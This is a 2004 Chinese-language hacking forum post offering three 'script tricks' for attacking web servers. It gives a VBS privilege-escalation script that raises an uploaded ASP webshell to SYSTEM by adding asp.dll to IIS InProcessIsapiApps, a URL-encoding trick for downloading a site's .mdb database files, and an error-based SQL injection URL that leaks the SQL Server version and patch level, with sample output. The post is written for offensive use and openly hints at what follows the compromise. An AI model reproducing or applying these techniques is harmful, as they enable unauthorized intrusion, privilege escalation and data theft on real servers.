技巧一
asp提升权限技巧一则
asp木马一直是搞脚本的朋友喜欢使用的工具之一,但由于它的权限一般都比较低(一般是IWAM_NAME权限),所以大家想出了各种方法来提升它的权限,比如说通过asp木马得到mssql数据库的权限,或拿到ftp的密码信息,又或者说是替换一个服务程序。而我今天要介绍的技巧是利用一个vbs文件来提升asp木马的权限,代码如下
========================================================
set wsh=createobject("wscript.shell") '创建一个wsh对象
a=wsh.run ("cmd.exe /c cscript.exe C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps C:\WINNT\system32\inetsrv\httpext.dll C:\WINNT\system32\inetsrv\httpodbc.dll C:\WINNT\system32\inetsrv\ssinc.dll C:\WINNT\system32\msw3prt.dll C:\winnt\system32\inetsrv\asp.dll",0) '加入asp.dll到InProcessIsapiApps中
========================================================
将其保存为vbs的后缀,再上传到服务上,
然后利用asp木马执行这个vbs文件后。再试试你的asp木马吧,你会发现自己己经是system权限了,接下来的事就不用我多说了吧!
技巧二
下载mdb数据库文件名中带#号的技巧
因为ie和常用的网络下载工具都不会处理#后面的文件名,遇到#工具就会认为已经结束了,所以文件名中带#号的mdb文件,我们是无法直接下载的。这时我们只需要把#转换成相应的unicode编码--%23,就可以搞定了!如图1所示!
技巧三
利用脚本漏洞得到系统版本和补丁情况
先测试一下,如存在注入漏洞,
则提交http://www.target.com/test.asp?id=175%20and%200<>(select%20@@version)
这样就会返回
Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Microsoft SQL Server 7.00 - 7.00.1063 (Intel X86) Apr 9 2002 14:18:16 Copyright (c) 1988-2002 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4) ' to a column of data type int.
/news_1.asp,行144
一目了然了!
作者: cambrigelq 时间: 2004-3-4 10:52 标题: 玩脚本的一些技巧!
